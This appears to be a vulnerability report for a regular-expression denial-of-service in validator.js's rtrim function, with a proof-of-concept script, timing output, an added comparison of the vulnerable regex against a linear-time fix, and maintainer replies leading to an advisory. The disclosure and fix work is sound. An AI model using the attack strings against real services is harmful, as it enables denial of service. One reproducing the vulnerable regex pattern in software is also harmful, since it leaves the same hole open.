Inefficient Regular Expression Complexity in validatorjs/validator.js
Reported on
Sep 21st 2021
Description
I would like to report a Regular Expression Denial of Service (ReDoS) vulnerability in validator.
It allows causing a denial of service when calling the function 'rtrim'.
The ReDoS vulnerability is mainly due to the regex /(\s)+$/g
and can be exploited with the following code.
Proof of Concept
// PoC.js
var validator = require("validator")
// Each iteration builds a longer string of the shape "a" + spaces + "a":
// the run of whitespace never reaches the end of the string, so the
// /(\s)+$/g pattern consumes the run, fails at `$`, and backtracks through
// it again at every start position (quadratic in the run length).
for (var i = 1; i <= 50000; i++) {
  var time = Date.now();
  var attack_str = 'a' + ' '.repeat(i * 10000) + "a";
  validator.rtrim(attack_str);
  var time_cost = Date.now() - time;
  console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms")
}
The Output
"attack_str.length: 10002: 326 ms"
"attack_str.length: 20002: 1105 ms"
"attack_str.length: 30002: 2489 ms"
"attack_str.length: 40002: 4462 ms"
"attack_str.length: 50002: 6967 ms"
"attack_str.length: 60002: 10265 ms"
Reference
I have opened an issue before, but it is still not safe after the fix.
For the fix, you can refer to the rtrim function in the trim package.
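As an added example (not code from this report, from validator.js, or from the trim package), the regex from the description beside a linear-time rtrim and a small timing harness for the report's attack string. The function names rtrimVulnerable, rtrimNoGroup, rtrimSafe, attackString and benchmark are assumptions chosen for illustration; the loop-based rtrimSafe is written here to show the idea of scanning from the end instead of backtracking, and is not the code either project shipped.

```javascript
// Added example: vulnerable anchor-at-end regex beside a linear-time rtrim.
// Names and the loop-based implementation are assumptions for illustration.

// The pattern from the report. On "a" + spaces + "a", every start position
// inside the run of whitespace lets (\s)+ consume the rest of the run, fail
// at `$` because the string ends in a non-space, then backtrack one
// character at a time: O(n) work at each of O(n) positions, O(n^2) overall.
const VULNERABLE_PATTERN = /(\s)+$/g;

function rtrimVulnerable(str) {
  return str.replace(VULNERABLE_PATTERN, '');
}

// Dropping the capture group does not help: /\s+$/ backtracks the same way,
// which is why an earlier "fix" can still be vulnerable.
function rtrimNoGroup(str) {
  return str.replace(/\s+$/g, '');
}

// Linear-time alternative: walk backwards from the end and stop at the first
// non-whitespace character. Testing a single character against /\s/ keeps
// exactly the regex notion of whitespace (tabs, newlines, \u00A0, \u2003,
// \uFEFF, ...), so the result matches the regex version on every input.
function rtrimSafe(str) {
  if (typeof str !== 'string') throw new TypeError('Expected a string');
  let end = str.length;
  while (end > 0 && /\s/.test(str.charAt(end - 1))) {
    end -= 1;
  }
  return str.slice(0, end);
}

// Builds the report's attack string: a non-space, n whitespace characters,
// then a non-space so the trailing run can never match at `$`.
function attackString(n) {
  return 'a' + ' '.repeat(n) + 'a';
}

function timeMs(fn, input) {
  const start = process.hrtime.bigint();
  fn(input);
  return Number(process.hrtime.bigint() - start) / 1e6;
}

// Returns one {n, vulnerableMs, noGroupMs, safeMs} row per input size.
function benchmark(sizes) {
  return sizes.map((n) => {
    const input = attackString(n);
    return {
      n,
      vulnerableMs: timeMs(rtrimVulnerable, input),
      noGroupMs: timeMs(rtrimNoGroup, input),
      safeMs: timeMs(rtrimSafe, input),
    };
  });
}

// Constructed sample inputs used to check that all three agree on the result.
const SAMPLE_INPUTS = ['', '   ', 'abc', 'abc \t\n', ' a b ', 'x\u00A0\u2003\uFEFF', attackString(3000)];

function allAgree() {
  return SAMPLE_INPUTS.every((s) => {
    const expected = rtrimSafe(s);
    return rtrimVulnerable(s) === expected && rtrimNoGroup(s) === expected;
  });
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('implementations agree on sample inputs:', allAgree());
  for (const row of benchmark([2000, 4000, 8000])) {
    console.log(`n=${row.n}: /(\\s)+$/ ${row.vulnerableMs.toFixed(1)} ms, ` +
      `/\\s+$/ ${row.noGroupMs.toFixed(1)} ms, loop ${row.safeMs.toFixed(2)} ms`);
  }
}
```

Doubling n should roughly quadruple the time of the two regex versions while the loop stays flat; the loop also makes the "whitespace" definition explicit in one place, so any later change to the character class cannot reintroduce a backtracking pattern.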
Occurrences
Thank you, Yeting Li, for again reporting a vulnerability in our package. Let me investigate the issue and get back to you ASAP.
A PR containing a fix has been created. We will probably make a new release in the next few days including this fix. Thanks again, Yeting Li, for spotting the ReDoS!
Awesome!
Once the fix has been merged, feel free to confirm the fix on the report, and we can go ahead and publish a CVE 👏
Thank you guys! We finally released the fix in validator 13.7.0. We will probably add a security advisory when the CVE is published.
Advisory published https://github.com/validatorjs/validator.js/security/advisories/GHSA-xx4c-jj58-r7x6 🎉